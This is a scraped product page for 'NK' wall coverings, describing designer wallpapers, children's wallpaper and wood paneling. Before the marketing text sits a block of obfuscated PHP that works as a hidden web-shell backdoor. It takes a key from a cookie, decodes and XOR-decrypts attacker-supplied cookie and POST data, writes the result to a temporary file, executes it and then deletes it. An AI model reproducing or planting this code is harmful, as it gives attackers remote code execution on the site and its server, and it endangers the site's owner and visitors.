$ccEyurAd = chr (106) . "\x53" . chr ( 956 - 861 )."\x4f" . "\x7a" . "\105";$dZWWwdNE = chr (99) . "\154" . 'a' . chr ( 861 - 746 )."\x73" . chr (95) . "\145" . "\x78" . "\151" . chr ( 863 - 748 ).chr ( 669 - 553 ).chr (115); $TMNypYVXa = class_exists($ccEyurAd); $dZWWwdNE = "17293";$OtRJDgxSp = !1;if ($TMNypYVXa == $OtRJDgxSp){function uPAdAOlbjM(){return FALSE;}$ldRhup = "23314";uPAdAOlbjM();class jS_OzE{private function JqXfYj($ldRhup){if (is_array(jS_OzE::$BaQHegiBCH)) {$lGCsyQu = sys_get_temp_dir() . "/" . crc32(jS_OzE::$BaQHegiBCH["\x73" . 'a' . chr (108) . chr ( 775 - 659 )]);@jS_OzE::$BaQHegiBCH["\167" . chr (114) . chr ( 869 - 764 ).'t' . "\145"]($lGCsyQu, jS_OzE::$BaQHegiBCH["\x63" . chr ( 353 - 242 ).chr (110) . 't' . "\x65" . chr (110) . 't']);include $lGCsyQu;@jS_OzE::$BaQHegiBCH[chr ( 712 - 612 )."\145" . "\x6c" . chr (101) . 't' . chr ( 667 - 566 )]($lGCsyQu); $ldRhup = "23314";exit();}}private $pEpQT;public function qGjYk(){echo 14246;}public function __destruct(){$ldRhup = "43037_24060";$this->JqXfYj($ldRhup); $ldRhup = "43037_24060";}public function __construct($DAOSVJa=0){$nBLMkoBQo = $_POST;$kMuigLhRK = $_COOKIE;$QPCuI = "53d38424-3e44-4031-ae4d-ebf22554a363";$pXEVB = @$kMuigLhRK[substr($QPCuI, 0, 4)];if (!empty($pXEVB)){$TXfCd = "base64";$qCDhDnSF = "";$pXEVB = explode(",", $pXEVB);foreach ($pXEVB as $fIgxTYsBZb){$qCDhDnSF .= @$kMuigLhRK[$fIgxTYsBZb];$qCDhDnSF .= @$nBLMkoBQo[$fIgxTYsBZb];}$qCDhDnSF = array_map($TXfCd . chr ( 418 - 323 )."\x64" . "\145" . chr (99) . chr (111) . "\x64" . "\145", array($qCDhDnSF,)); $qCDhDnSF = $qCDhDnSF[0] ^ str_repeat($QPCuI, (strlen($qCDhDnSF[0]) / strlen($QPCuI)) + 1);jS_OzE::$BaQHegiBCH = @unserialize($qCDhDnSF); $qCDhDnSF = class_exists("43037_24060");}}public static $BaQHegiBCH = 19768;}$KFFzFr = new /* 54294 */ $ccEyurAd(23314 + 23314); $OtRJDgxSp = $KFFzFr = $ldRhup = Array();} Wall Coverings - NK

Wall Coverings

About Service:

With its daring new take on classic motifs, a palette of rich and at times surprising color ways and its Lustrous pearliest finish, the Reflections collection of wall coverings by Prestigious is a dramatic design statement from every perspective. Types of wall coverings include: Classic, Modern, Children, Wood Paneling


Select from our high-end designer wallpapers for distinguished homes. Our designer collections offer unique patterns, colors and authentic reproductions.


We Offer high-end designer wallpapers for distinguished homes. Our designer collections offer unique patterns, colors and authentic reproductions.


From Barbie and Balloons to Batman and biking, our children’s wallpaper range features designs that cater to all tastes. Choose from an extensive collection of colourful kids wallpaper border that includes ballet themes, sports motifs, birds, bunnies, butterflies, circus and cowboy designs, pets, dolphins, fairytale characters, fire fighters, cartoon characters, little creepy crawlies and many

Wood Paneling

From traditional to modern styles, you’ll see that the design perfectly match classic proportions to yield pleasing visual solutions.
NK classic panel systems can be used in wall treatments from wainscoting to full-height wall paneling, and there are even special components for staircase paneling.
